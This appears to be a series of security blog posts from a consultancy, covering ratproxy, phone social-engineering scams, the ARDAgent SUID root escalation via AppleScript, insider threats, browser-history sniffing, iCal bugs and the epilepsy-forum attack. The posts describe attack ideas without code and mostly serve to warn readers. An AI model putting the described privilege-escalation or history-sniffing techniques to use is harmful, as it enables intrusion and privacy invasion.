Google announced that it has released ratproxy their passive web analysis tool. It kind of “rides along with you” in order to determine what areas may be an issue. Since it can “ride along”, it can also scan restricted areas requiring authentication. It’s not a replacement for some of the more active scanners – webscarab and paros but it could certainly help the more casual user determine potential issues. It doesn’t, however, let you fiddle with the HTTP request/responses as the other proxies do. Play with it, see how you like it before adding it to your arsenal, but I think it will be a great addition.
Telephones are unsecured, direct access conduits to your users and can traverse passwords, encryption, and any other fancy technical protections.
Many people are confident they won’t fall for the “you’ve just won a million dollars, give me your bank account information so we can transfer the money!!” type of scheme. If it’s too good to be true (as they say) it usually is.
Put people on the defensive and these tricks work a little better.
The phone rings, you pick it up, and the caller identifies himself as an officer of the court. He says you failed to report for jury duty and that a warrant is out for your arrest. You say you never received a notice. To clear it up, the caller says he’ll need some information for “verification purposes”-your birth date, social security number, maybe even a credit card number.
Social engineering works because people are the weakest link in security. Training to protect against these attacks in a work environment are difficult, especially to positions that require many phone calls. Employees caught off guard, stressed, or disgruntled are particularly vulnerable.
More technical details can be found at this excellent piece at Matasano Chargen.
Tiger and Leopard shipped with the Apple Remote Desktop agent (ARDAgent) is set UID as root. To make it worse, it supports AppleScript, and one of the actions it supports is “do shell script”. You can see where this is leading. This type of vulnerability (root access through a SUID root program) is one that I would classify as ancient. Most SUID root programs really look at the code and make sure they’re not doing something this stupid.
The solution is easy: if you’re not using Apple Remote Desktop, remove it, or chmod u-s it (removes the SUID bit).
However, this vulnerability does need local access, so it’s somewhat difficult to exploit unless you regularly leave your mac logged in at a coffee shop while you use the facilities.
What it does bring up is how much Apple is investing in secure development and security? If this (quite old style) vulnerability got through, what else would. Of course, Apple may not have any security employees old enough to remember these types of vulnerabilities. History, even of old systems and old vulnerabilities, is still useful for teaching students.
At the recent InfoSec conference in London, Secure Computing conducted a survey of IT managers. Their findings are interesting:
Over 80 per cent of respondents said that data leaks by insiders, whether deliberate or accidental, is at the top of their list of security woes.
Only 17 per cent cited external threats posed by cyber-criminals, such as spammers and hackers, as more dangerous.
This shows that insider threats are considered more of an issue than external threats.
IT managers have to worry about all of the threats to their systems and data, and to that end, they analyze each threat and assign a risk level to it. Obviously, this group of managers consider internal threats a higher risk than external threats.
Usually when we’re asked to perform penetration testing, we’re asked to perform it as an outside attacker – with no knowledge or access to internal systems. I have seen a few clients request internal assessments or testing, but it tends to cost more because of the need for consultants/testers to be on-site – increasing travel/lodging costs.
If you don’t hire an external company to help you evaluate your internal systems and controls, please at least do it yourself. Remember, most IT managers consider internal threats more dangerous.
What are you to do if you want readers to promote your content? ... You have to decide on which bookmarking site, if any, to dedicate your precious screen real-estate. It’s a hard choice. If you choose poorly your reader won’t vote—it’s not a single click coupled and out-of-sight means out-of-mind—and your content losses its chance to make it big. You have to choose your horse wisely.
If you could detect which social bookmarking sites your reader uses, on a per-reader basis, you could display only the badges they care about. But you can’t know that because the browser secures the user’s history, right? Wrong.
Let's try it. You have visited: .
So, is this a cool capability, or a creepy violation of your privacy? I think it is the former; since the code all runs client-side and can be disabled using a tool such as NoScript, and it benefits the user with a cleaner interface. Provide your comments below!
Core Security released details on three iCal bugs last week. What’s suspicious is that Apple hasn’t fixed them yet, despite being told in January. The bugs are relatively harmless if you have iCal configured correctly – ie. to not automatically parse invitations from Mail. Unfortunately, that’s not the default on Leopard. I’ve run into the same problem before, and I turned the “feature” off for other reasons.
There’s a bug in the ics parser that could potentially allow for remote code execution. Not good.
Any program that automatically opens up attachments from your mail reader -Mail, Outlook, Thunderbird, etc. SHOULD BE RECONFIGURED! The same goes for remote images. Any attachment should be suspect unless you know who it came from, and SPAM does not qualify as “knowing who it came from”.
This simple configuration/re-configuration can save you a lot of headaches in the long run, in addition to any known vulnerabilities floating around, you’ve closed off a vector for new ones.
Hackers pulled off an attack that had a physical effect when they found a way to post flashing images on an epilepsy forum. Some users of the site experienced migraines and “near-seizure reactions.”
The attack happened when hackers exploited a security hole in the foundation’s publishing software that allowed them to quickly make numerous posts and overwhelm the site’s support forums.
I remember learning in my computer ethics class about bad programming practices that led to physical injuries and even death. Lax security can have all sorts of effects, and when you see someone intentionally trying to bring physical harm to a group of people, you get an idea of the type of person we’re working against.
Please visit our brand new re-launched website for Gemini Security Solutions. The new site has whitepapers, security tools, and a lot more information about what we can do for you.
